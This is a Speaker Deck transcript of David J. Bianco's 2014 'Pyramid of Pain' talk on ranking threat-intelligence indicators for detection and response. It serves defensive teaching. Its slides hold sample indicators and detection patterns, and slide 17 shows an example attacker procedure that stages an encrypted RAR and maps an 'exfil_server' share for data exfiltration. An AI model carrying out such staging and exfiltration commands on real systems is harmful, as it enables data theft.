Upgrade to Pro — share decks privately, control downloads, hide ads and more …

The Pyramid of Pain: Intel-Driven Detection & Response to Increase Your Adversary's Cost of Operations

David J. Bianco
June 06, 2014
Technology
1
2.3k

The Pyramid of Pain: Intel-Driven Detection & Response to Increase Your Adversary's Cost of Operations

[As Presented at RVASec, June 2014]

There’s more to good threat intelligence than lists of domains or IPs, and it’s useful for more than just finding bad actors in your environment. What if I told you that you could use threat intelligence not only to get better at detecting and responding to incidents, but also to make your attackers’ lives significantly more difficult, to drive up the costs of their operations and to potentially make it so expensive to operate against you that they give up? Sound too good to be true?
In this talk, I’ll cover a practical, proven framework for applying threat intel to incident detection and response. The framework’s centerpiece is the Pyramid of Pain. The result of nearly 5 years experience directing the global detection program for a Fortune 5 company, the Pyramid is a blueprint for turning your incident response capability into an offensive weapon to cause pain for your attackers.

David J. Bianco

June 06, 2014
Tweet

More Decks by David J. Bianco

See All by David J. Bianco
Generative AI in Cybersecurity: Rise of the Machines?
davidjbianco
0
21
Trust Unearned? Evaluating CA Trustworthiness Across 5 Billion Certificates
davidjbianco
0
160
Five Lies & a Truth: Attacking the Defender's Dilemma
davidjbianco
0
38
Five Lies and a Truth: Attacking the Defender's Dilemma
davidjbianco
0
230
Developers: What Your Security Team Wishes You Knew (And It's Not Secure Coding!)
davidjbianco
0
120
Raising the Tide: Driving Improvement in Security by Being a Good Human
davidjbianco
0
38
Evolving the Hunt: A Case Study in Improving a Mature Hunt Program
davidjbianco
0
940
Quality Over Quantity: Determining Your CTI Detection Efficacy
davidjbianco
1
370
Quality over Quantity: Determining Your CTI Detection Efficacy
davidjbianco
0
260

Other Decks in Technology

See All in Technology
KubeConにproposalを送りたい人へのアドバイス
sat
PRO
3
270
MapLibreとAmazon Location Service
dayjournal
1
170
Microsoft for Startups Founders Hub_20240429 update
daikikanemitsu
1
2.4k
LLM開発・活用の舞台裏@2024.04.25
yushin_n
3
1.1k
今年のRubyKaigiはProfiler Year🤘
osyoyu
0
310
Improve Your Development Workflow with Gemini Code Assist
meteatamel
0
120
R3のコードから見る実践LINQ実装最適化・コンカレントプログラミング実例
neuecc
3
1.7k
コードファーストの考え方。 Amplify Gen2から学ぶAWS次世代のWeb開発体験
yoshiitaka
1
250
ルーターでプレゼンする
puhitaku
1
3.2k
ServiceNow Knowledge 24の歩き方 EYストラテジー・アンド・コンサルティング
manarobot
0
220
生成AIの変革の時代に、 直近1年で直面した課題とその解決策
ktc_wada
0
510
Azure Container Apps + Bicep 〜 こんな感じで運用しています
kaz29
3
610

Featured

See All Featured
RailsConf & Balkan Ruby 2019: The Past, Present, and Future of Rails at GitHub
eileencodes
126
32k
How GitHub (no longer) Works
holman
305
140k
Fantastic passwords and where to find them - at NoRuKo
philnash
38
2.5k
Art, The Web, and Tiny UX
lynnandtonic
290
19k
Documentation Writing (for coders)
carmenintech
61
4k
How to train your dragon (web standard)
notwaldorf
74
5.2k
Understanding Cognitive Biases in Performance Measurement
bluesmoon
11
1k
Dealing with People You Can't Stand - Big Design 2015
cassininazir
358
22k
Gamification - CAS2011
davidbonilla
76
4.6k
Helping Users Find Their Own Way: Creating Modern Search Experiences
danielanewman
21
1.9k
Building Flexible Design Systems
yeseniaperezcruz
320
37k
How to name files
jennybc
65
93k

Transcript

  1. Copyright © 2014, FireEye, Inc. All rights reserved. | CONFIDENTIAL

    1 The Pyramid of Pain Intel-Driven Detection & Response to Increase Your Adversary’s Cost of Operations

  2. Copyright © 2014, FireEye, Inc. All rights reserved. | CONFIDENTIAL

    2 The Wacky Wall Walker Approach The most common approach to “threat intel” I see is… THROW ALL OUR FACTS OUT THERE AND SEE WHAT STICKS. Pros Quick to implement Cons Too many alerts No confidence in results Gives your adversaries a laugh We can do better!

  3. Copyright © 2014, FireEye, Inc. All rights reserved. | CONFIDENTIAL

    3 Enterprise Security Monitoring Threat Intelligence Technical Data HTTP Server & Proxy Logs Firewalls & Network Infrastructure IDS/NSM/ Endpoints OS & Application Logs Business Data Org Charts Employee DB Travel Plans Enterprise Security Monitor

  4. Copyright © 2014, FireEye, Inc. All rights reserved. | CONFIDENTIAL

    4 The Intel-Driven Operations Cycle Direction Collection Analysis Dissemenation Observe Compare Alert Validate Contain Investigate Remediate Intelligence Detection Response Validated Alerts Quality Feedback

  5. Copyright © 2014, FireEye, Inc. All rights reserved. | CONFIDENTIAL

    5 Let’s be clear… Most people confuse with intelligence.

  6. Copyright © 2014, FireEye, Inc. All rights reserved. | CONFIDENTIAL

    6 Let’s Be Clear… Captain, I do not believe that to be the correct use of the term.

  7. Copyright © 2014, FireEye, Inc. All rights reserved. | CONFIDENTIAL

    7 Let’s Be Clear…

  8. Copyright © 2014, FireEye, Inc. All rights reserved. | CONFIDENTIAL

    8 The Reality is More Complicated Intelligence! Expert Analysis Facts Raw Data

  9. Copyright © 2014, FireEye, Inc. All rights reserved. | CONFIDENTIAL

    9 Indicators, the Avatars of Intelligence A piece of information that points to a certain conclusion

  10. Copyright © 2014, FireEye, Inc. All rights reserved. | CONFIDENTIAL

    10 What it is not ≠

  11. Copyright © 2014, FireEye, Inc. All rights reserved. | CONFIDENTIAL

    11 The Pyramid of Pain The Pyramid measures potential usefulness of your intel It also measures difficulty of obtaining that intel The higher you are, the more resources your adversaries have to expend. When you quickly detect, respond to and disrupt your adversaries’ activities, defense becomes offense.

  12. Copyright © 2014, FireEye, Inc. All rights reserved. | CONFIDENTIAL

    12 TTPs Tools Network/Host Artifacts Domain Names IP Addresses Hash Values Hashes Hashes are, by far, the highest confidence indicators. Unfortunately, they are extremely susceptible to change (even accidentally). Hashes are probably the least useful type of indicators. MD5 5f6ce162c4b5516670d5a8f1f8f4e57b SHA1 C8d4c389beaff88811f8fab1965519fce74ffd8a SHA256 ad690662a1faf97dc41387b73f8fd3415d64f9b0ce66db3e9134385d94e0c01b

  13. Copyright © 2014, FireEye, Inc. All rights reserved. | CONFIDENTIAL

    13 TTPs Tools Network/Host Artifacts Domain Names IP Addresses Hash Values IP Addresses Only n00bs use their own addresses. VPNs, Tor, open proxies all make it trivial to change your IP. If it’s hardcoded into a config, maybe adversaries have to do a little work to update it. Dotted Decimal 192.168.1.1 Dotted Hex 0xC0.0xA8.0x01.0x01 Dotted Octal 0300.0250.0001.0001 Decimal 3232235777 Hex 0xC0A80101 Octal 030052000401

  14. Copyright © 2014, FireEye, Inc. All rights reserved. | CONFIDENTIAL

    14 TTPs Tools Network/Host Artifacts Domain Names IP Addresses Hash Values Domain Names Almost as easy to change as IP addresses. Domains require pre-registration and (usually) a fee, but there are ways around this. Dynamic DNS providers even help automate the adversary’s update process with helpful APIs. Unicode 邪悪なドメイン.com Punycode Xn—q9j5f9d1dzdq306auhtd.com Legitimate Domain rvasec.com Malicious Homograph rvasec.com

  15. Copyright © 2014, FireEye, Inc. All rights reserved. | CONFIDENTIAL

    15 TTPs Tools Network/Host Artifacts Domain Names IP Addresses Hash Values Network & Host Artifacts It’s very difficult to perform useful activities without leaving some traces. On hosts, look for files & directories, registry objects, mutexes, memory strings […] On the network, check for distinctive transaction values, especially protocol errors or just misinterpretations. Distinctive URI patterns /^[A-F0-9]{16}\/\d{3,5}\.{php|aspx}$/ User-Agent Strings xi/1.0 Typos Mozilla/5.0 (compatible; MSIE7.0; Windows NT 6.1;)

  16. Copyright © 2014, FireEye, Inc. All rights reserved. | CONFIDENTIAL

    16 TTPs Tools Network/Host Artifacts Domain Names IP Addresses Hash Values Tools If you see the same tool over and over, you eventually get really good at detecting it. No matter what incidental changes they make, your detection mechanisms can deal with them. To continue, they need a new tool. With testing & training time, that’s a real victory! Once upon a time, there was an incident response team who encountered the same tool over and over again for more than a year. The tool had a bolt-on network front end, so the attackers could easily change the network protocol, but the back end was always the same. Eventually, the IR team realized that the distinctive keep-alive function was part of the back end, and could be reliably detected. And then everyone (except the attacker) slept well at night and lived happily ever after!

  17. Copyright © 2014, FireEye, Inc. All rights reserved. | CONFIDENTIAL

    17 TTPs Tools Network/Host Artifacts Domain Names IP Addresses Hash Values Tactics, Techniques & Procedures TTPs are the expression of the attacker’s training. Retraining is probably the hardest thing you can do once, let alone continually. This becomes so expensive that they have to question their commitment to attacking you. Win! Data Staging Tactic Create encrypted RAR and transfer them to the exfiltration point. Data Staging Technique AES encryption, files of exactly 650,000 bytes, file copies via SMB Data Staging Procedure winrar a –hpqwerty –r vacation_photos.rar staging_dir net use \\exfil_server\photos

  18. Copyright © 2014, FireEye, Inc. All rights reserved. | CONFIDENTIAL

    18 In Summary

  19. Copyright © 2014, FireEye, Inc. All rights reserved. | CONFIDENTIAL

    19 Questions? David J. Bianco [email protected] @DavidJBianco detect-respond.blogspot.com